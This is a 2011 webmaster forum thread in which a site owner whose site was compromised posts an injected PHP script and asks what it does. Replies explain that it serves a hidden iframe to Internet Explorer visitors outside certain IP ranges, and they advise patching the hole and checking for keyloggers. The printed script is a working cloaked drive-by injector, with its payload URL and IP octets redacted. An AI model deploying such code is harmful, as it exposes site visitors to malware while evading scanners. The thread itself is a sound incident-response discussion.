Welcome to WebmasterWorld Guest from 54.167.46.29

Forum Moderators: coopster & jatar k

Message Too Old, No Replies

Site Compromised. Need Help Understanding This Script

     
5:24 pm on Mar 11, 2011 (gmt 0)

Junior Member

5+ Year Member

joined:Aug 17, 2006
posts:61
votes: 0


Hi,

I don't know if this is the correct forum for this or not, so please excuse me if I'm not in the correct place.

This morning I kind of accidentally discovered that my site had been compromised. What I found was this script being loaded in the footer of my pages.

I don't know enough about the code used to understand what it does... would anyone like to help me figure it out?

Thanks in advance!

<?
function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}

function net()
{
$ip=$_SERVER['REMOTE_ADDR'];

if(
net_match('64.***.160.0/19',$ip)==0 &&
net_match('66.***.0.0/20',$ip)==0 &&
net_match('66.***.64.0/19',$ip)==0 &&
net_match('72.***.192.0/18',$ip)==0 &&
net_match('74.***.0.0/16',$ip)==0 &&
net_match('89.***.224.0/24',$ip)==0 &&
net_match('193.***.125.0/24',$ip)==0 &&
net_match('194.***.194.0/24',$ip)==0 &&
net_match('209.***.128.0/17',$ip)==0 &&
net_match('216.***.32.0/19',$ip)==0 &&
net_match('128.***.0.0/16',$ip)==0 &&
net_match('67.***.0.0/16',$ip)==0 &&
net_match('188.***.0.0/16',$ip)==0
)
return true;
}

function detect_os() {
global $os;
$user_agent = $_SERVER['HTTP_USER_AGENT'];
if(strpos($user_agent, "Windows") !== false) $os = 'windows';
}detect_os();


function detect_brows() {
global $OOOOO0000, $OOOOOO000;
$user_agent = $_SERVER["HTTP_USER_AGENT"];
if (preg_match("/MSIE 6.0/", $user_agent) OR
preg_match("/MSIE 7.0/", $user_agent) OR
preg_match("/MSIE 8.0/", $user_agent)
) $OOOOOO000 = "MSIE";
}detect_brows();

$IP = "{$_SERVER[REMOTE_ADDR]}.log";

function _log()
{ global $IP;
touch ("/tmp/freshnews/{$IP}");
}

function _check()
{
global $IP;
if(!file_exists("/tmp/freshnews/{$IP}")) return true;
}
$sfkg=base64_decode('[alphanumeric string]');
if(_check())
{
if(net())
{
if($os)
{
if($OOOOOO000 == "MSIE")
{
echo 'document.write(\'<iframe frameborder=0 src="'.$sfkg.'" width=1 height=1 scrolling=no></iframe>\');';

_log();

}}}}

[edited by: tedster at 7:33 pm (utc) on Mar 12, 2011]
[edit reason] obscure specifics [/edit]

5:47 pm on Mar 11, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member topr8 is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Apr 19, 2002
posts:3171
votes: 8


it doesn't matter what it does, you've got to patch the hole in your security.

... at a glance it serves an iframe, doubtless with a dubious source to internet explorer users who are not from the ip ranges shown
5:52 pm on Mar 11, 2011 (gmt 0)

Junior Member

5+ Year Member

joined:Aug 17, 2006
posts:61
votes: 0


Thanks topr8,

Yes, I am in the process of finding and patching the hole. They seem to have accessed the site via FTP.

It seemed like knowing what the script does would help me find any other compromised files, directories, etc.

Thanks again.
6:06 pm on Mar 11, 2011 (gmt 0)

Senior Member

WebmasterWorld Senior Member jimbeetle is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Oct 26, 2002
posts:3292
votes: 6


They seem to have accessed the site via FTP

Then be sure to check your local machine for a keylogger, scrub it good if one is found, then change all your passwords.
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

Featured Threads

Free SEO Tools

Hire Expert Members